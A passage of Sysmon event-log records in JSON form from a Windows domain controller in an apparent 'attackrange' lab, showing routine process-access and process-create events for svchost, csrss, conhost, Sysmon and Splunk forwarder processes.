05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CF-5F25-0000-001093190400}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CF-5F25-0000-001093190400}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.599\r\nProcessGuid: {A837DB8D-01D0-5F25-0000-0010621B0400}\r\nProcessId: 3752\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.599","ProcessGuid":"{A837DB8D-01D0-5F25-0000-0010621B0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01D0-5F25-0000-0010621B0400}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01D0-5F25-0000-0010621B0400}","TargetProcessId":"3752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01D0-5F25-0000-0010621B0400}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01D0-5F25-0000-0010621B0400}","TargetProcessId":"3752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:56.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:56.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 